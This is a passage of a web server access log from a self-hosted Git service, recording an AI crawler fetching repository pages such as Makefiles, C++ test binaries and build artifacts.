"/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 202127] [Gzip 15.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:52:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/base_library.zip" +[17/Feb/2026:14:52:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/.vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode" +[17/Feb/2026:14:52:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/.vscode" +[17/Feb/2026:14:52:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f.patch" [Client 74.7.227.38] [Length 1473] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f" +[17/Feb/2026:14:52:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 16086] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:14:52:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 16085] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:14:52:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 74.7.227.38] [Length 9915] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" +[17/Feb/2026:14:52:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 4636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:14:52:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 4636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:14:52:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" [Client 74.7.227.38] [Length 18089] [Gzip 14.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" +[17/Feb/2026:14:52:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" [Client 74.7.227.38] [Length 9908] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" +[17/Feb/2026:14:52:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 74.7.227.38] [Length 11004] [Gzip 4.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" +[17/Feb/2026:14:52:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" [Client 74.7.227.38] [Length 14174] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" +[17/Feb/2026:14:52:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 74.7.227.38] [Length 947] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" +[17/Feb/2026:14:52:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/database.sqlite?display=rendered" [Client 74.7.227.38] [Length 10877] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/database.sqlite" +[17/Feb/2026:14:52:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument" [Client 74.7.227.38] [Length 10099] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument" +[17/Feb/2026:14:52:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot" +[17/Feb/2026:14:52:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/" +[17/Feb/2026:14:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10067] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 18933] [Gzip 14.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:52:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 12519] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument" +[17/Feb/2026:14:52:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 11765] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument" +[17/Feb/2026:14:52:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10895] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject" +[17/Feb/2026:14:52:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10894] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject" +[17/Feb/2026:14:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10895] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject" +[17/Feb/2026:14:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9918] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:52:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10898] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject" +[17/Feb/2026:14:52:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:52:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9897] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:52:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:52:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:52:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 2167] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:14:52:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 887] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:14:52:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main" +[17/Feb/2026:14:52:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49518] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main" +[17/Feb/2026:14:52:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main" +[17/Feb/2026:14:52:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49517] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main" +[17/Feb/2026:14:52:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main" +[17/Feb/2026:14:52:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main" +[17/Feb/2026:14:52:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49521] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main" +[17/Feb/2026:14:52:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main" +[17/Feb/2026:14:52:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main" +[17/Feb/2026:14:52:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:52:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10896] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject" +[17/Feb/2026:14:52:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9910] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main" +[17/Feb/2026:14:52:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49519] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main" +[17/Feb/2026:14:52:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10872] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main" +[17/Feb/2026:14:52:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:52:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:52:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main" +[17/Feb/2026:14:52:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10895] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 